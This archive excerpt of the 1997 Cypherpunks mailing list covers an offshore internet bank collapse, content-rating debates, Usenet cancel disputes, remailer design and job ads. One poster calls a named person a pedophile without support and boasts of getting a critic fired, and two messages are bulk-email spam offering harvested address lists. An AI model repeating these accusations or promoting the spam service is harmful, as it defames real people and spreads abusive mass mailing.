always posts everything through various exitman remailers.  (Or normal
middleman mode, and leave the hassle of installing software to keep up
to date on current exitmen to other exitman-using middleman
remailers).

Adam
-- 
Have *you* exported RSA today? --> http://www.dcs.ex.ac.uk/~aba/rsa/

print pack"C*",split/\D+/,`echo "16iII*o\U@{$/=$z;[(pop,pop,unpack"H*",<>
)]}\EsMsKsN0[lN*1lK[d2%Sa2/d0



http://nytsyn.com/live/Latest/218_080697_110027_578.html

Fraud Feared as Antigua Net Bank Fails 

By EMILE VALERE 
c.1997 Bloomberg News 

T. JOHN'S, Antigua - The Antigua and Barbuda government issued a fraud
alert Tuesday after the collapse of European Union Bank and the
disappearance of
its cofounders. 

The locally-chartered bank, which fired all its employees last Thursday,
had
marketed itself as the first off-shore bank on the Internet. 

The Antiguan government hired the accounting firm Coopers and Lybrand
LLP to
examine the records of the three-year-old company. 

Callers to the bank heard a recorded message that gave only a hint that
something
was amiss. 

``Welcome. You have reached the European Union Bank,`` said a
reassuring-sounding male voice. ``Due to technical reasons, some of our
services
involving the security mode are temporarily unavailable.'' 

The bank's Internet site, http://www.eubank.ag , was also unavailable. 
Meanwhile, the government is on the look-out for the bank's founders,
Serbveo
Ushakov, allegedly of Bronxville, New York, and Vietalui Papsouev of
Richmond
Hill, Ontario, according to the Caribbean News Agency. The government
says the
two are Russian nationals. 

The Idaho Department of Finance on May 30 ordered European Union to stop
soliciting deposits from Idaho residents over the Internet. 

``I can't say I'm surprised'' at the news of the bank's collapse, said
Gavin Gee,
director of the department. 

Idaho alleged the bank, without a state or federal charter, was
operating illegally.
Gee said he hopes other U.S. regulators will take similar actions
against off-shore
banks soliciting over the Internet. 

``If nobody's going to take action against fraud on the Internet, we've
got a serious
problem,'' said Gee. 

Antigua has more than 50 off-shore banks. Prime Minister Lester Bird
last
February targeted three of them to be shut down because of their alleged
involvement with Russian crime rings. 

The Associated Press reported last week that the Bank of England warned
investors last fall about depositing funds in European Union Bank. 

(The Bloomberg web site is at http://www.bloomberg.com )< 

(Disbributed by The N.Y. Times News Service)< 

NYT-08-06-97 1054EDT<






From randerso at ece.eng.wayne.edu  Fri Aug  8 01:00:22 1997
From: randerso at ece.eng.wayne.edu (Ryan Anderson)
Date: Fri, 8 Aug 1997 16:00:22 +0800
Subject: "Voluntary Censorship" vs. Govt Legislation
In-Reply-To: <19970806141137.51900@bywater.songbird.com>
Message-ID: 



On Wed, 6 Aug 1997, Kent Crispin wrote:

> This is not a good analogy at all.  Have you ever noticed that there
> are "childrens books" sections in the library? In fact, books in
> libraries *do* have ratings -- they just use a different technique
> than stamping it on the book.

Exactly!  Such a system (perhaps patterned after the Dewey Decimal System,
with expansion to handle fiction, news sites, etc or the Library of
Congress system, though I know very little about this system, and it's
probably too complicated to do on the net effectively) would allow you to
search for a site that contained information about "Green Eggs and Ham"
under children, for information about the Dr. Seuss book, and under news
for information about the nasty new genetic disease running through US
farms.  [finctional example, but I think the point got across, hopefully]

Two things need to be prevented to make this a viable solution:  NO
MANDATES from government, though a request for sites that are somewhat
controversial, such as adult sites to mark pages as such should not be
considered a horrible idea, this already happens to some extent in other
areas.

The second thing, and most important, is that web search engines need to
index *every* page, and allow the topical/categorization system as a way
to further limit searchs.  

This would be a method that I think would remove most of the fears in
place.  Search engines can't start limiting indexes to just the rated
sites, or they become a *major* problem on the net, but improving
searching is not somethign to be ignored in this issue.

This is a much more important issue than the filter of adult sites.  It
happens to provide a convenient way to do that, however, in a manner that
allows parents to limit whatever they want... [ you don't want your child
learnign about certain things?  block those ratings.. adult sites will
probably have a better percentage of categorizing than most others, but
no matter what you pick, something will listed under that...)

-----------------------------------------------------------------------
Ryan Anderson -      "Who knows, even the horse might sing" 
Wayne State University - CULMA   "May you live in interesting times.."
randerso at ece.eng.wayne.edu                        Ohio = VYI of the USA 
PGP Fingerprint - 7E 8E C6 54 96 AC D9 57  E4 F8 AE 9C 10 7E 78 C9
-----------------------------------------------------------------------






From declan at well.com  Fri Aug  8 01:17:05 1997
From: declan at well.com (Declan McCullagh)
Date: Fri, 8 Aug 1997 16:17:05 +0800
Subject: Query on cookies
In-Reply-To: 
Message-ID: 



Thanks for the help, folks. This is for an article on privacy I was
working on, and I found the info I needed. For instance, Netscape's
explanation of the protocol left me wondering about whether cookies from
acme.com could be requested by competitor.com.

I ended up talking to some Netscape engineers, who were as puzzled as I
was by where the term "cookie" came from. But I found it in the good ol'
Jargon File... 

-Declan


On Thu, 7 Aug 1997, Steve Schear wrote:

> At 12:23 PM -0700 8/6/97, Declan McCullagh wrote:
> >Does anyone have a detailed understanding of how cookies work? I've read
> >Netscape's explanation of the protocol, but I still have some questions.
> >
> >-Declan
> 
> The July issue of Internet World, "Baking Your Own Cookies," contains a
> good introduction into some of the details.
> 
> --Steve
> 
> 
> 
> 






From rah at shipwright.com  Fri Aug  8 01:17:26 1997
From: rah at shipwright.com (Robert Hettinga)
Date: Fri, 8 Aug 1997 16:17:26 +0800
Subject: IPSEC Analyst and Engineers Wanted
Message-ID: 




--- begin forwarded text


X-Authentication-Warning: silence.secnet.com: majordom set sender to
owner-security-jobs at secnet.com using -f
From: "Meryweather, Rod" 
To: "'security-jobs at secnet.com'" 
Subject: IPSEC Analyst and Engineers Wanted
Date: Wed, 6 Aug 1997 15:51:30 -0400
X-Priority: 3
MIME-Version: 1.0
Sender: owner-security-jobs at secnet.com
Precedence: bulk

WANG GOVERNMENT SERVICES
SECURITY SERVICES
POSITION OVERVIEW AND SUMMARY

Organization Overview
The Wang GS Security Services organization is a descendant from the
Honeywell Information Systems group that has been focused on developing
High Assurance computing solutions for the US Government since the late
1970's.  Honeywell was the first vendor to have a system evaluated by
the NSA National Computer Security Center (NCSC) against the Orange Book
(a document that defines levels of trust that can be reached by
operating systems) at the A1 level - the highest - in 1984.  Our XTS 300
product is a direct descendent of the A1 SCOMP platform, and is
currently evaluated at the B3 level of trust.

The Security Services (SS) organization focuses on development and
deployment of secure solutions.   Product activities are contained in a
group focused on the XTS 300 operating system and a trusted guard
development framework product (the SAGE).  The rest of the organization
is focused on implementation of task-specific solutions.  These
currently include:

The DMS/DII Guard:  This is a multi-year development effort that will
result in a XTS 300-based X.400/X.500 guard with strong user
authentication and encryption support (FORTEZZA).

The State Department Guard:  This is a new project that will implement a
proprietary (State-compliant) XTS 300-based telegram network guard that
works with identification of unclassified telegrams.

The Command and Control Guard:  The C2G effort involves the evolution of
an existing XTS 300-based Government-owned Guard application that is
deployed world-wide.

The FBI:  Wang currently has developed and deployed multiple IBM
communications guards for the FBI, and continues to evolve and enhance
the functional capabilities of these XTS 300-based systems.

The IRS:  This effort does not involve the XTS 300.  Rather, Wang is
responsible for the EDI telecommunications and security infrastructure
of the IRS Tax Collection system, based on an NCR commercial Unix
platform.

DLA Security Assessment:  Wang currently supports the security planning,
assessment and accreditation activities with the DLA and the Defense
MegaCenter in Dayton, Ohio.

General Technical Requirements
Excellent C and Unix skills (we do not code in C++ except for the IRS
project).  Strong structured design and documentation skills.  Linux OS
on Pentium workstation.  Heavy emphasis on one of the following areas:
Computer Security, Unix Kernel (device drivers, printer drivers, API, OS
construction), Communications (TCP/IP, X.400, X.500, SNMP), Encryption
(PCMCIA or software-based), GUI development (X), Testing.  MUST be
clearable to TS.  MUST have a BS degree or equivalent experience.  MUST
be a self-starter and quick learner.   Competitive compensation and
benefits, casual dress code, technical organization.  Herndon location
as of August 1, 1997.  See
http://www.wangfed.com/products/ssso/homepage.html for product details,
http://wang.com for information about Wang.

Specific Positions

Senior OS Developer (1)

Candidate will be a member of the XTS 300 OS development staff, and
should have considerable exposure (8-15 years) to the construction and
enhancement of a Unix OS.  Activities include API development and
enhancement, device driver implementation (e.g., printer, SCSI,
"console", PCMCIA devices, ethernet (802.3 + 100Mb or ATM)), application
porting (e.g., X), bug fixes, and new platform porting (from one Pentium
mother board to the next).  Orange Book security a BIG plus.

Junior OS Developer (2)

Candidate will be a member of the XTS 300 OS development staff, and
should be very comfortable with heavy structured C and Unix (OS
construction, release building from source, etc.)  Linux experience a
big plus.  2-5 years experience with heavy C, Unix, and at least one of
the following:  GUI development, application porting on Unix,
communications (TCP/IP, X.4/500, SNMP),  systems installation and debug,
heavy scripts, heavy testing. Orange Book security a BIG plus.

XTS 300 GUI Developer

Candidate will initially be assigned to the State Department Guard task,
and will be responsible for the specification, design, development,
implementation, testing and documentation of the man-machine interfaces
for this Guard (Main-in-the-Middle review capability, dirty word list
management, report generation, etc.).  This will be developed with a
subset of X (Motif-based).  3-5 years experience in X, C, Unix,
documentation, design.

Sr. XTS Applications Developer (3)

Candidate will be a member of the XTS 300 Application Development focus
group, and will be responsible for a lead role in the development of
Guard applications.  Must have 8-15 years heavy C, Unix, Comm (TCP/IP,
X.4/500), structured design, documentation, development, implementation,
testing, debug and support.  Orange Book Security and Guard/Firewall
design a big plus.

Jr. XTS Applications Developer (3)

Candidate will be a member of the XTS 300 Application Development focus
group, and will be responsible for a supporting role in the development
of Guard applications.  Must have 2-5 years heavy C, Unix, with a focus
in one or more of the following: Comm (TCP/IP, X.4/500), structured
design, documentation, development, implementation, testing, debug and
support.  Orange Book Security and Guard/Firewall design a big plus.

Accreditation Support/Risk Assessment

Candidate will be a member of the DMS/DII Guard Development and
Deployment team, and will be responsible for taking a lead role in the
assessment and justification of the assurance of the Guard architecture.
Required 6-12 years experience with trusted solutions and architectures,
X.400/X.500, accreditation and deployment issues.  Strong documentation
and communications (verbal) experience.



Rod Meryweather
Sr. Security Analyst

                     Wang Federal, Inc.
Rod.Meryweather at wang.com
                     540 Huntmar Park Dr.                Wk:  (703)
827-3818
                     Herndon , Va 22102-4299          Fax: (703)
827-3161




--- end forwarded text



-----------------
Robert Hettinga (rah at shipwright.com), Philodox
e$, 44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'
The e$ Home Page: http://www.shipwright.com/







From dformosa at st.nepean.uws.edu.au  Fri Aug  8 01:17:49 1997
From: dformosa at st.nepean.uws.edu.au (? the Platypus {aka David Formosa})
Date: Fri, 8 Aug 1997 16:17:49 +0800
Subject: forged cancels (Re: Entrust Technologies's Solo - free download)
In-Reply-To: <4DL2ae16w165w@bwalk.dm.com>
Message-ID: 



-----BEGIN PGP SIGNED MESSAGE-----

On Wed, 6 Aug 1997, Dr.Dimitri Vulis KOTM wrote:

> Tim Skirvin  writes:
> > 	Not accepted ones.  They're treated as rogues, and asked to stop
> > it, and you know it.
> 
> Net.Scum like [...] Tim Brown,

Tim Brown is not an accepted canceler.

[...]

> Examples of lies in Tim Skirvin's Magnum Opus, the "Cancel FAQ" (what else):
> 
[...]
> ]Sounds cool.  Where do I get one?
> ]
> ]	If you have to ask, you don't get one.

[...]

> My cancelbot has been freely available for over 18 months.

And if thay can't find it thay have to ask therefore thay don't get one.
There are freely advalable alt.* newsgroup creation scripts, and still
peaple don't know how to post cancels.

- -- 
Please excuse my spelling as I suffer from agraphia see the url in my header. 
Never trust a country with more peaple then sheep.  ex-net.scum and proud
You Say To People "Throw Off Your Chains" And They Make New Chains For
Themselves? --Terry Pratchett

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3i
Charset: noconv

iQCVAwUBM+qYSaQK0ynCmdStAQHQ+wP/XyMjFJs4tHq2qmwU9Ruve8vMdD574k2M
VXAxct9gwyJoP6w1vcmLJ8FnJ+IhFQPuFIP336QqhCRX+Uac7zeJ9akkTVrSE0J+
U8NSgXTjxwEIeOs9+lbiOwMkcBORXhsmUrPlyGkC8kyFzkzMun+4WtwwmDFsDdw4
1yjqDo5r/qk=
=Z0Lr
-----END PGP SIGNATURE-----






From declan at well.com  Fri Aug  8 01:18:05 1997
From: declan at well.com (Declan McCullagh)
Date: Fri, 8 Aug 1997 16:18:05 +0800
Subject: Applied crypto, security guru needed, from Coopers & Lybrand
Message-ID: 



[From a CMU computer science department mailing list. --Declan]

---------- Forwarded message ----------
>From: Dahl Gerberick 
>
>Hi,
>
>I recently took a senior level position with Coopers & Lybrand in Boston.
>As such it has come to my attention that they are looking for someone with
>the following background.
>
>I do not expect that you will know where I can find such a person right
>now, but if you keep this message handy you might think of me if that
>person should come along in the near future.
>
>If you should find someone who meets these requirements please get back to
>me, or have them contact me directly.
>
>          Dahl Gerberick
>          617-478-9936 (Office)
>          617-478-5900 (Fax)
>          617-784-2701 (Home)
>          gerberick at acm.org
>
>Thanks
>Dahl - -
>
>PS:  Feel free to redistribute this message as you see fit.
>
> - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
>- - - - - - - - - - - - - - - - - - - - -
>
>  1.  Minimum 5- 10 years experience in applied cryptography
>
>  2.  Ability to design and implement security applications that utilize
>       encryption technology
>
>  3.  Extensive knowledge of X.509 standards for digital certificates
>
>  4.  Detailed knowledge of all prevailing algorithms, DES, IDEA, RSA,
>       Elliptic curve, etc.
>
>  5.  Algorithm development background not necessary
>
>  6.  Intimate knowledge of all national standards for cryptographic
>       implementations such as ANSI X.9 working group standards
>
>  7.  Intimate knowledge of all commercially available encryption
>       products from vendors such as Entrust, Verisign, Cylink, IBM,
>       GTE, etc.
>
>  8.  Knowledge of legal implications of electronic commerce such
>       as ABA Digital Signature standard
>
>  9.  Security consulting background a plus
>
>  10. Technical skill in TCP/IP, UNIX, internetworking technology
>
>
>
>











From azur at netcom.com  Fri Aug  8 01:18:05 1997
From: azur at netcom.com (Steve Schear)
Date: Fri, 8 Aug 1997 16:18:05 +0800
Subject: Query on cookies
In-Reply-To: 
Message-ID: 



At 12:23 PM -0700 8/6/97, Declan McCullagh wrote:
>Does anyone have a detailed understanding of how cookies work? I've read
>Netscape's explanation of the protocol, but I still have some questions.
>
>-Declan

The July issue of Internet World, "Baking Your Own Cookies," contains a
good introduction into some of the details.

--Steve







From mail at sendmailco.com  Fri Aug  8 01:18:13 1997
From: mail at sendmailco.com (mail at sendmailco.com)
Date: Fri, 8 Aug 1997 16:18:13 +0800
Subject: 25,000,000 People
Message-ID: <199708070921.CAA11112@sweden.it.earthlink.net>



Would you be interested in...

* Sending out Bulk Email FREE for 30 Days?
* Receiving 25 MILLION Email Addresses FREE of charge?
* Sending out Bulk Email using your CURRENT Internet Account,
  without EVER having to worry about it being canceled?
* Sending out a FREE Bulk Email Advertisement for your Business
  or Web Page to over 250,000 people per day?
* Posting a FREE Ad for your business to over 25,000 Newsgroups
  in under three hours?

To find out how to do all of this and more for FREE, email our
autoresponder at: send at nim.com

You MUST Place the word "FREE" in the Subject Line so our
autoresponder mailbot can send you this FREE Information!


To be removed from our mailing list, email our autoremover
at: remove at nim.com

You MUST Place the word "REMOVE" in the Subject Line so our
autoremover mailbot can remove you from our mailing list.






From dlv at bwalk.dm.com  Fri Aug  8 01:18:16 1997
From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Fri, 8 Aug 1997 16:18:16 +0800
Subject: forged cancels (Re: Entrust Technologies's Solo - free download)
In-Reply-To: 
Message-ID: 



? the Platypus {aka David Formosa}  writes:

> On Mon, 4 Aug 1997, Dr.Dimitri Vulis KOTM wrote:
>
> > I think the extreme aversion to censorship (like that displayed by imp
> > and myself) seldom arises in people who haven't themselves been victims
> > of censorship
>
> Dose threats from a multynatnatil corpration count?  Dose living in
> Austrlia count?

Evidently these haven't made you into a staunch opponent of censorship.
Perhaps if they did succeed in pulling your plug, you'd feel differently.

> > The current top "spam canceller", Rich Bland ("cosmo")
>
> Jem seems to have gotten to the top of the list now.

I haven't been tracking the forgers lately.  For those who don't know
John E. Milburn: he's an expatriate U.S. engineer who used to work in
South Korea and forge cancels from there in a variety of newsgroups
(like alt.religion.monica). I caught him forging a cancel for one of
my articles (for "homophobia" and "excessive cross-posting"). Milburn
lost his job in Korea last year (possibly because of the complaints
about his net-abuse) and announced his "retirement" from forging cancels.
I'm sorry to see this bastard back.

> > I was just pointing out that it's factually incorrect to use
> > "admins" as a synonym for "anti-spammers".
>
> No sane person would suggest that (i.e. lots of peaple on usenet would
> make that suggestion) because if it was true then we wouldn't have the
> problems with agis or uunet.

Tim Skirvin presents these "newbies" with a false view of Usenet as a
unified front of news admins who have all reached consensus that free
speech is evil and are now fighting the evil spammers.

> > Chris Lewis and Dave Barr obth
> > forge cancels for usenet articles that follow up on their articles and quot
> > them, claiming "copyright violations".
>
> This is interesting,  proof please.

Check out Chris Lewis's Net.Scum page at http://www.netscum.net/lewisc0.html.
Find "Edward Gerk" - one of the people who quoted Chris Lewis and whose
articles Chris Lewis canceled for "copyright violations".

Next check out Barr's Net.Scum page at http://www.netscum.net/barrd0.html.
Find "Alain Larouche" - same thing.

> > Once the offending articles are part of the spool on toher site, it's
> > pointless for me to issue cancels.
>
> Not even to free up diskspace?

Correct.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps






From dlv at bwalk.dm.com  Fri Aug  8 01:18:21 1997
From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Fri, 8 Aug 1997 16:18:21 +0800
Subject: forged cancels (Re: Entrust Technologies's Solo - free download)
In-Reply-To: 
Message-ID: <39q2ae27w165w@bwalk.dm.com>



? the Platypus {aka David Formosa}  writes:

> On Mon, 4 Aug 1997, Dr.Dimitri Vulis KOTM wrote:
>
> > Pedophile Chris Lewis is a content censor.
>
> I don't think Mr Lewis' algeded activerties with childeren have any
> validity to the argument.  Calling him a 'Pedophile' or any other name is
> not effective in changing my option about this mattor.

"Chris Lewis" is a common name.  "Pedophile Chris Lewis" serves to identify
the content censor who works for Bell North Forgery Research / Northen
Telecom Forgers and uses their facilities to forge Usenet cancels for
articles whose contents he doesn't like.

> >  There are dozens of other examples.
>
> As yet I have seen only the one, could you provide these other examples
> where Chris Lewis has perposly canceled posts that he dosn't like.

David, you're bordering on asciribing to me things I haven't said -
is you reading as bad as your writing?

I said, there were dozens of examples of cancel-forgers who claim to be
cancelling "spam" (i.e. multi-posts), but are in fact cancelling singly posted
articles whose contents they simply didn't like. Pedophile Chris Lewis is one
of many such content censors. Let's count the ones we find at
http://www.netscum.net: 1) Guy Macone 2) Sally Monde, 3) Tim Brown, 4) Bob
Curtis, 5) Sean Eric Fagan, 6) Nat Makarevitch, 7) Michael Horansky, 8) David
Howard, 9) Alex Bulan, 10) "Eric Dynamic", 11) John Milburn, 12) Gabriel
Krabbe, 13) Odd Einar Aurbakken, 14) Alan Reichert, 15) Andreas Kirchwitz, 16)
Dax Hutcheon, 17) James Gardner, 18) Otmar Lendl, 19) Henning Weede, 20) Ian
Goldberg, 21) Gregory Woodbury, 22) Bruce Lane, 23) Otto Makela, 24) Steve
Manes, 25) Rich Sauers, 26) Ralph Valentino, 27) Luis Echeverria, 28) Michael
S. Scheidell, 29) Matthias Scheler, 30) Wolfgang Schelongowski, 31) Dick
Depew, 32) Ed Hew, 33) George Nemeyer, 34) Edward Igoe, 35) Tom Phoenix, 36)
Michael Shields - that's 3 dozen, an there's probably twice as many more
listed on the Net.Scum pages. Check out Sally Monde: the lady claims to be a
heroin junky currently using methadone, she described how her Legal Aid lawyer
got a psychiatrist to convince the court that she's insane, so she's out of
jail and collecting SSI on mental disability - and she's forging cancels for
aricles she considers to be "racist crap". Do you want Sally to decide for you
what you're allowed to read vs. what's the forbodden "racist crap"?

> > > Since Dr Vulis is the newsadmin of that site, the question is quite valid
>
> > I would like to be able to tell
> > the rest of Usenet that these articles are not worth reading,
>
> And if thay should deside the what is not work reading is not worth
> storing?

My telling the readers of the affected newsgroups that an article posted
under my name isn't worth reading (e.g. because the car advertized as
being for sale has already been sold) is not a reason for news admins
(generally, a different group of people) to remove such an article from
their spool and to deprive their users of the ability to read that article
(e.g., to compare the asking prices for cars).  I'm not talking to
admins.  If they abuse my message by using it as a basis to remove
such articles from spool, then I'll be reluctant to issue it.

> > > Frees up diskspace + reducers propragtion.  May be a good thing.
> >
> > A spew spreads to almost all the servers there are in minutes.
>
> It seems to me more in the range of hours or days, esp in the case of
> uucp sites wich don't connect often.

This was the case many years ago.  These days, a spam propagates pretty
much everywhere because the cancels catch up with it.  The claim that
cancels save bandwidth is an outright lie.

> > > > We've got to receive repeated
> > > > blasts of forged cancels ten times the number of the offending posts?
> > >
> > > Ergh?  There is only one cancel per post.
> >
> > Were you around when Ausralia was knocked off the net by the cancels for th
> > Cantor and Siegel "spam"?
>
> There _is_ I'm talking about present tence.  Any anty spammer who dosn't
> follow the convention is going to be stopped or losse there account (eg
> David Richards).

David Richards is the sysop of the Ripco BBS in Chicago. He's been forging
cancels for dozens of articles he considers to be "off-topic" - see his
Net.Scum page at http://www.netscum.net/richard0.html.  He's been doing
this for months and no one's been able to stop him.

Scott Sadow's been forging cancels for months - he hasn't been stopped and
hasn't lost his account (see his Net.Scum page).

> >  Most of the forgers didn't follow the "$alz" convention (giving the
> > forged cancel the message-id "cancel.".
>
> I would argue that all cancels (not just 3rd party) should follow the
> message id protocol.

I would argue that all cancels should be ignored irrespective of message-id.

> And yes if thay set the reply-to: feild of the message to me I do consider
> it my post and cancelble from me.

To hell with cancels, but you should be able to issue a retraction nocem.

> > How about me posting under my own name or via an anonymous remailer, "Platy
> > is a spammer - complain to his ISP"?
>
> Both uws.edu.au and acmeonnline would know these complants are bogus.

I hope so.  A couple of weeks ago some scumbag posted via a remailer an
annoucement that "vulis at bwalk.dm.com" is responsible for some sort of
net-abuse. This address doesn't exist; nevertheless I received several
postmaster complaints about this address, giving detailed description of
the alleged abuse (junk mail, thousands of usenet articles, etc). One of
the complainers wrote from a work account - I tried to get him fired and
apparently succeeded :-) :-) :-)

> > How about if someone posted your credit card numbers to Usenet?
>
> I don't have a credit card for just that reson.  The creadit card securaty
> system is so fundermently flawed as to be the equiverlent of sticking a
> large sign on your forhead marked "ROB ME"

That's right, except in the U.S. various laws protect the consumer.
(The card issuer gets to eat the losses, and passes the cost to the
consumer whether or not he has a card :-)

Many Cabal supporters cite credit card numbers as the canonical example
of the kind of traffic that must be cancelled on sight. They're idiots.
Once a credit card # has been posted to Usenet, the card must be cancelled
at once to make it unusable. Cancelling the article won't make the number
"safe" again.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps






From nospam-seesignature at ceddec.com  Fri Aug  8 01:18:42 1997
From: nospam-seesignature at ceddec.com (nospam-seesignature at ceddec.com)
Date: Fri, 8 Aug 1997 16:18:42 +0800
Subject: anti-spam law implies laws against remailers?
In-Reply-To: <199708061705.SAA03362@server.test.net>
Message-ID: <97Aug7.103456edt.32257@brickwall.ceddec.com>



On Wed, 6 Aug 1997, Adam Back wrote:

> 2) When the government or whoever wants to sue someone for spam they
>    will have to prove who the spammer is.  (Right?)  So now they'll
>    look at the From address at it will say remailer at foo.com.  So
>    they'll go have a chat to Fred Q Cypherpunk who operates foo, and he
>    won't be able to cooperate because he doesn't keep logs.  They won't
>    be happy with Fred, and will pass this information along to him by
>    stealing his equipment, prosecuting him for assisting in a felony
>    crime (they'll make it a felony right?), lock him and throw away
>    the key.  But what about Freds constitutional protection of the
>    speech forwarded by his remailer?  (Judge + congress-critter:
>    Constitution wassat?)
> 
> 3) Repeat step 2 x 100 and "something will have to be done" about the
>    remailers (if there are any left!)  It really isn't that far
>    fetched to have laws against remailers in the US.  Not so long ago
>    the guy from the two-man band Georgia EFF were telling us about how
>    they fought some law which had already tried to do this in that
>    state.

I suppose you could sue a local office or copier services place if I sent
one "unsolicited commercial fax" using their equipment, but it would be
impractical.

Most of the spam I get has thousands of other recipients, and none of it
has ever gone through a remailer, and always points to a "spam-friendly" 
ISP, or often already has their account cancelled by the time I report it. 

If we could get AGIS (the last of the large bandwidth suppliers) to pull
the plug on the IEMMC sites - I already have many spams from their members
violating their code - most spam would disappear.  It also seems that AGIS
is getting a bad reputation, but I don't know how many sites are leaving
or joining, but if they don't have interesting content, and don't pull the
plug on the IEMMC, adjustments to enough routing tables will accomplish
the same thing.

If we can stop the bulk spammers, things would quiet down.  The problem is
to stop the smokestack belching smoke without preventing me from using a
torch in my back-yard at night.

If remailers don't automatically do anonymous mailings to a 10,000 entry
Bcc: list, they would only be able to spam a few hundred people at a time
even using remailers.

Generally that isn't enough to be worth the time since only a tiny
fraction of a percentage will respond to generic requests.  If you can
only do 500, it would then pay to get a narrower list, or even personalize
things, and I might actually read something that interests me.  No one
considers announcements for cryptographic technology products on this list
as "SPAM".

--- reply to tzeruch - at - ceddec - dot - com ---






From azur at netcom.com  Fri Aug  8 01:18:45 1997
From: azur at netcom.com (Steve Schear)
Date: Fri, 8 Aug 1997 16:18:45 +0800
Subject: Eternity Uncensorable?
In-Reply-To: 
Message-ID: 



>Mark Grant  writes:
>> On Wed, 6 Aug 1997, Adam Back wrote:
>The solution is to have disposable tents, lots of.
>
>What about AOL disks?  We need shorter lived, disposable remailers as
>exit remailers...  Let them take the heat, while the real remailers
>walk.  Lets see a series of "exitman" remailers.  Exitman remailers
>are walking targets left to fend for themselves as long as they may.
>
>I propose that an exit remailer is replaceable, that is another
>remailer can instantly step into it's place and take traffic.  The way
>to do this is to have a special automated reporting mechanism for
>exitman remailers.  An easy way to do it is to have the exitman
>remailers send mail to a given mailing list.  Other remailers which
>wish to use exitman remailers just subscribe to the chosen mailing
>list.  We just need a remailer command indicating the creation of a
>new exitman remailer.  I guess the exitman remailer just sends one
>message per day, or whatever, and if it stops, you write it off.
>
>Is there a military term for something sent in to get shot to bits,
>just to distract attention from other movement?  A decoy?

A possible problem is the motivation of those setting up decoys.  If
they're doing it to help thwart remailer abuse, fine.  But what if their
intent is to thwart remailers?  Couldn't these dissidents set up black-hole
remailers which are simply information sinks?  When a email is
chain-remailed and doesn't get delivered many, but not all, senders would
simply assume one of the remailers are having delivery problems and resend.
Will Raph's approach work to monitor  decoys when their number and identity
are constantly changing?  Won't this significantly complicate remailer
clients?

--Steve







From tcmay at got.net  Fri Aug  8 01:19:10 1997
From: tcmay at got.net (Tim May)
Date: Fri, 8 Aug 1997 16:19:10 +0800
Subject: "A new battle over keeping the Net clean," by J.Weber/LATimes
In-Reply-To: 
Message-ID: 



At 3:23 PM -0700 8/5/97, bpettigrew at usa.net wrote:

>The solution to bad speech is more speech.  Don't suppress, ban,
>or oppose RSAC.  Provide alternatives.
>

Most of us aren't trying to "ban" labels, or suppress or oppose them, per se.

Just to ban, suppress, and oppose:

- any scheme to require them

- any scheme in which labels are an "affirmative defense"

- any "mandatory voluntary" schemes

- any moves to legislate or dictate the forms labels may take


--Tim May




Voluntary Mandatory Self-Rating of this Article
(U.S. Statute 43-666-970719).
Warning: Failure to Correctly and Completely Label any Article or Utterance
is a Felony under the "Children's Internet Safety Act of 1997," punishable
by 6 months for the first offense, two years for each additional offense,
and a $100,000 fine per offense. Reminder: The PICS/RSACi label must itself
not contain material in violation of the Act.

** PICS/RSACi Voluntary Self-Rating (Text Form) ** :

Suitable for Children: yes  Age Rating: 5 years and up.
Suitable for Christians: No Suitable for Moslems: No  Hindus: Yes
Pacifists: No  Government Officials: No  Nihilists: Yes  Anarchists: Yes
Vegetarians: Yes  Vegans: No  Homosexuals: No  Atheists: Yes
Caucasoids: Yes  Negroids: No  Mongoloids: Yes
Bipolar Disorder: No  MPD: Yes and No  Attention Deficit Disorder:Huh?

--Contains discussions of sexuality, rebellion, anarchy, chaos,torture,
regicide, presicide, suicide, aptical foddering.
--Contains references hurtful to persons of poundage and people of
color.Sensitive persons are advised to skip this article.

**SUMMARY**
Estimated number of readers qualified to read this: 1
Composite Age Rating: 45 years







From mail at sendmailco.com  Fri Aug  8 01:19:29 1997
From: mail at sendmailco.com (mail at sendmailco.com)
Date: Fri, 8 Aug 1997 16:19:29 +0800
Subject: 25,000,000 People
Message-ID: <199708070921.CAA12275@sweden.it.earthlink.net>



Cypherpunks,


Would you be interested in...

* Sending out Bulk Email FREE for 30 Days?
* Receiving 25 MILLION Email Addresses FREE of charge?
* Sending out Bulk Email using your CURRENT Internet Account,
  without EVER having to worry about it being canceled?
* Sending out a FREE Bulk Email Advertisement for your Business
  or Web Page to over 250,000 people per day?
* Posting a FREE Ad for your business to over 25,000 Newsgroups
  in under three hours?

To find out how to do all of this and more for FREE, email our
autoresponder at: send at nim.com

You MUST Place the word "FREE" in the Subject Line so our
autoresponder mailbot can send you this FREE Information!


To be removed from our mailing list, email our autoremover
at: remove at nim.com

You MUST Place the word "REMOVE" in the Subject Line so our
autoremover mailbot can remove you from our mailing list.






From declan at well.com  Fri Aug  8 01:19:42 1997
From: declan at well.com (Declan McCullagh)
Date: Fri, 8 Aug 1997 16:19:42 +0800
Subject: Third party rating systems are good for society
Message-ID: 





---------- Forwarded message ----------
Date: Thu, 7 Aug 1997 19:33:16 -0700 (PDT)
From: Declan McCullagh 
To: Stanton McCandlish 
Cc: mnorton at cavern.uark.edu, jellicle at inch.com,
    fight-censorship at vorlon.mit.edu
Subject: Third party rating systems are good for society


On Thu, 7 Aug 1997, Stanton McCandlish wrote:

> [Lest more people send hatemail, please keep in mind that the description
> of third party ratings as "good things" here means a proliferation of
> third party reviews of  content, goods and services just like we have in
> the real world. It does not mean Milburn imposing his morality on the

I'm still wrestling with how to think about third party rating systems in
general and clunky, pejorative systems like RSACi in particular. How to
differentiate the two in principle? Time to reread the ALA's statements
again.

For I think in general, third party rating systems are boons to society. 
Think of the Good Housekeeping Seal of Approval, Underwriter Labs, and
kosher rating agencies. These are socially useful devices, each one of
them. (I'd be interested to hear what similar systems have sprouted in
other countries.) 

Or, to put it in cypherpunkly terms, marks allow the redistribution of
reputation capital. The Time logo and the Netly News URL on my business
card may boost my reputation when presented to someone who doesn't know
